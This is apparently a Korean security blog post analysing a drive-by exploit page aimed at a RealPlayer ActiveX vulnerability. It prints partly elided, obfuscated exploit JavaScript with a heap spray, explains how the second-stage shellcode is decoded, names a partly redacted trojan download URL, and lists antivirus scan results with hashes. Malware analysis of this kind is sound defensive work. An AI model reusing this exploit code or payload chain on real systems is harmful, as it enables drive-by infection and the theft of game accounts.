본문 바로가기

security/악성코드 유포

RealNetworks RealPlayer ActiveX contorls Vulnerability

* 먼저 이글에서 도움을 주신 네오님 감사합니다~
이글은 비 전문가인 제가 아는데 까지만 서술 한것을 알려드립니다. 수정 할 점이 있으면 댓글 주세요.

Exploit.RealPlayerRmoc3260.b 로 불리는 것을 오늘 오전에 중국사이트 내에서 보았다. 코드를 보았을 때는 막막하였다.. 하지만 도움을 받아 하나 둘씩 풀어 나가다 보니.. 최종파일 까지 보게 되었다.
r1.htm에서 바로 최종을 드롭하는것이 아니라 . ga.js로 넘어가서 마지막 파일까지 드롭하는 방식을 사용한것으로 보인다~
하지만 ga.js로 넘어가서도 리플레이스를 한번 더 해줘야만 최종 파일까지 근접할수가 있다. 리플레이스 방식에서 대해서는 r1.htm을 해석 한다면 쉽게 알수 있다.....
r1.htm의 형식은 다음과 같다

html>
<head>
<div id=ahahah style='display:none'>%72%72%72%3D%72%72%72%2E%72%65%70%6C%61%63%65%28%2F%3D%2F%67%2C%22%30%22%29(중략)30%29%20%62%6C%6F%3D%20%62%6F%63%6B%20%2B%20%62%6C%6F%63%6B%20%6C%6C%62%6C%6F%63%6B%3B</div>

<script src="ga.js" language="JavaScript"></script>

  <script language="JavaScript">

     var rrrriii=document.getElementById("\x61"+"\x68\x61"+"\x68\x61\x68").innerHTML;
 eval(unescape(rrrriii));

 try {
  new window["Act"+"iveXObject"]("AnHey.Wm");
      }
      catch (e) {
   var tgTSov1 = 400;
   var DXVpMkf1 = new window["\x41"+"\x72\x72"+"\x61\x79"]();
   for (i = 0; i < tgTSov1; i++){ DXVpMkf1[i] = block + ahririri }
   
  var aoSU$1 = 32;
  var u$kSs1 = '';
  while (u$kSs1["\x6c"+"중략"+"\x68"] < aoSU$1) u$kSs1 = u$kSs1 + window["\x75\x6e"+"\x65"+"\x73"+"중략"+"\x65"]("\x25"+중략+"\x43");

}

function ahso()

    var _NNieb1 = '';

    _NNieb1 = aheygg["\x43"+"\x6f\x6e\x73"+"\x6f"+""중략""];
    aheygg["\x43"+""중략""+"\x73\x6f\x6c"+"\x65"] = u$kSs1;
    aheygg["\x43"+"\x6f"+""중략""+""중략""] = _NNieb1;
   
    _NNieb1 = aheygg["\x43"+""중략""+"\x6c\x65"];
    aheygg["\x43"+"\x6f\x6e\x73"+""중략""] = u$kSs1;
    aheygg["\x43"+"중략"+"\x65"] = _NNieb1;
   
   
}
 
   </script>
 
 
</head>
<body onload="JavaScript: return ahso();">

    <object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="aheygg"></object>

</body>
</html>


clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93  이것을 통해서 검색을 해보니 취약점이 나오게 되었다 해당 취약점은 2007년에 이미 패치가 된것으로 알려지고 있다.

clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93 자세한 사항 : http://kr.ahnlab.com/info/securityinfo/secuinfo/newSecuScrap.ahn?seq=12281

뭐 아무튼 리플레이스도 봤으면 다시 ga.js 로 넘어간다 .

var rrr = "tt9=9=tt9=9=tt9=9=tte1d9tt34d9tt5824tt5858 (중략) tt440ftt4459tt2121 이런식으로 되어있다.
리플레이스 방법은 tt = "%u" , = 를 "0" 으로 대체해준다면
마지막 최종 파일 
http://www.jx(중략)twg.com/dnf/01.exe 에 접근할수 있다.
최종파일은 온라인 계정 해킹으로 보인다 .

[바이러스 토탈]

File name:

r1.htm

Antivirus Version Last update Result
AhnLab-V3 2010.09.10.00 2010.09.10 -
AntiVir 8.2.4.50 2010.09.09 HTML/Rce.Gen
Antiy-AVL 2.0.3.7 2010.09.10 -
Authentium 5.2.0.5 2010.09.09 -
Avast 4.8.1351.0 2010.09.09 -
Avast5 5.0.594.0 2010.09.09 -
AVG 9.0.0.851 2010.09.09 -
BitDefender 7.2 2010.09.10 -
CAT-QuickHeal 11.00 2010.09.09 -
ClamAV 0.96.2.0-git 2010.09.10 -
Comodo 6029 2010.09.10 -
DrWeb 5.0.2.03300 2010.09.10 -
Emsisoft 5.0.0.37 2010.09.10 -
eSafe 7.0.17.0 2010.09.07 -
eTrust-Vet 36.1.7845 2010.09.09 -
F-Prot 4.6.1.107 2010.09.01 -
F-Secure 9.0.15370.0 2010.09.10 -
Fortinet 4.1.143.0 2010.09.09 -
GData 21 2010.09.10 -
Ikarus T3.1.1.88.0 2010.09.10 -
Jiangmin 13.0.900 2010.09.09 -
K7AntiVirus 9.63.2483 2010.09.09 -
Kaspersky 7.0.0.125 2010.09.10 -
McAfee 5.400.0.1158 2010.09.10 -
McAfee-GW-Edition 2010.1B 2010.09.09 -
Microsoft 1.6103 2010.09.10 -
NOD32 5438 2010.09.09 -
Norman 6.06.06 2010.09.09 -
nProtect 2010-09-09.03 2010.09.09 -
Panda 10.0.2.7 2010.09.09 -
PCTools 7.0.3.5 2010.09.10 -
Prevx 3.0 2010.09.10 -
Rising 22.64.03.01 2010.09.09 -
Sophos 4.57.0 2010.09.10 -
Sunbelt 6853 2010.09.09 -
SUPERAntiSpyware 4.40.0.1006 2010.09.10 -
Symantec 20101.1.1.7 2010.09.10 -
TheHacker 6.7.0.0.012 2010.09.09 -
TrendMicro 9.120.0.1004 2010.09.10 -
TrendMicro-HouseCall 9.120.0.1004 2010.09.10 -
VBA32 3.12.14.0 2010.09.08 Exploit.JS.Agent.acp
ViRobot 2010.9.8.4031 2010.09.09 -
VirusBuster 12.64.26.0 2010.09.09 -
MD5: 6c73a4171a5c6a540e841634028936cd
SHA1: 4c8ac028611a7427526c870a7b2b50e8e4a26c92
SHA256: f96ba1653c502d8474591cb7f504e9a6a067c7dbc9e0efc2b0372efcd2d7a5bd
File size: 2760 bytes
Scan date: 2010-09-10 01:49:06 (UTC)


File name:

01.exe

Antivirus Version Last update Result
AhnLab-V3 2010.09.10.00 2010.09.10 Dropper/Win32.OnlineGameHack
AntiVir 8.2.4.50 2010.09.09 TR/Spy.Gen
Antiy-AVL 2.0.3.7 2010.09.10 Trojan/Win32.OnLineGames.gen
Authentium 5.2.0.5 2010.09.09 W32/OnlineGames.A.gen!GSA
Avast 4.8.1351.0 2010.09.09 Win32:Lolyda-B
Avast5 5.0.594.0 2010.09.09 Win32:Lolyda-B
AVG 9.0.0.851 2010.09.09 PSW.OnlineGames3.ATGB
BitDefender 7.2 2010.09.10 Gen:Trojan.Heur.RP.bmHfaqpOWMj
CAT-QuickHeal 11.00 2010.09.10 -
ClamAV 0.96.2.0-git 2010.09.10 Trojan.Spy-73885
Comodo 6029 2010.09.10 TrojWare.Win32.PSW.OnLineGames.~Bnkk
DrWeb 5.0.2.03300 2010.09.10 Trojan.PWS.Siggen.7648
Emsisoft 5.0.0.37 2010.09.10 Trojan-GameThief.Win32.WOW!IK
eSafe 7.0.17.0 2010.09.07 -
eTrust-Vet 36.1.7845 2010.09.09 Win32/Gamepass!generic
F-Prot 4.6.1.107 2010.09.01 W32/OnlineGames.A.gen!GSA
F-Secure 9.0.15370.0 2010.09.10 Gen:Trojan.Heur.RP.bmHfaqpOWMj
Fortinet 4.1.143.0 2010.09.09 -
GData 21 2010.09.10 Gen:Trojan.Heur.RP.bmHfaqpOWMj
Ikarus T3.1.1.88.0 2010.09.10 Trojan-GameThief.Win32.WOW
Jiangmin 13.0.900 2010.09.09 Trojan/PSW.OnLineGames.budt
K7AntiVirus 9.63.2483 2010.09.09 Riskware
Kaspersky 7.0.0.125 2010.09.10 Trojan-GameThief.Win32.OnLineGames.bnkk
McAfee 5.400.0.1158 2010.09.10 Suspect-D!DAC41243EBD5
McAfee-GW-Edition 2010.1B 2010.09.10 PWS-Gamania.dll
Microsoft 1.6103 2010.09.10 PWS:Win32/Dozmot.A
NOD32 5438 2010.09.09 Win32/TrojanDropper.Agent.ORH
Norman 6.06.06 2010.09.09 W32/Magania.GZ
nProtect 2010-09-09.03 2010.09.09 -
Panda 10.0.2.7 2010.09.09 Suspicious file
PCTools 7.0.3.5 2010.09.10 Trojan-PSW.Gampass
Prevx 3.0 2010.09.10 -
Rising 22.64.03.01 2010.09.09 Trojan.PSW.Win32.GameOL.urk
Sophos 4.57.0 2010.09.10 Mal/PWS-CF
Sunbelt 6853 2010.09.09 BehavesLike.Win32.Malware.dah (mx-v)
SUPERAntiSpyware 4.40.0.1006 2010.09.10 Trojan.Agent/Gen-OnlineGames
Symantec 20101.1.1.7 2010.09.10 Infostealer.Gampass
TheHacker 6.7.0.0.012 2010.09.09 Trojan/OnLineGames.bnkk
TrendMicro 9.120.0.1004 2010.09.10 TSPY_DOZMOT.SMC
TrendMicro-HouseCall 9.120.0.1004 2010.09.10 TSPY_DOZMOT.SMC
VBA32 3.12.14.0 2010.09.08 TrojanDropper.Agent.cxks
ViRobot 2010.9.8.4031 2010.09.10 -
VirusBuster 12.64.26.0 2010.09.09 -
MD5: dac41243ebd58ae95904a0fa28fdf3a1
SHA1: 915f9213e6bb2d883f04cfcec12968f5009c2175
SHA256: fe18635af5c45e9436c145a4eb001f3a2ab92e701cc72e4a9effb364c44139e5
File size: 21032 bytes
Scan date: 2010-09-10 03:30:04 (UTC)


파일 신고 : 이스트 소프트 , 안철수연구소 , 네이버 !!

  • 문스랩닷컴 2010.09.10 15:07

    악성 코드가 삽입되는 HTML은 유해하다고 보지 않는 것이 정설(!)인거 같네요.

    다만, 실행 파일은 칼! 같이 잡네요.

    좋은 글 잘봤습니다~

    • Kwan's 2010.09.10 15:10 신고

      아는대로만 썼는데~ 잘봐주셔서 감사합니다~ 유익한 문스랩님 글을 오히려 제가 잘보고 한 수 배우고 있습니다~ㅎ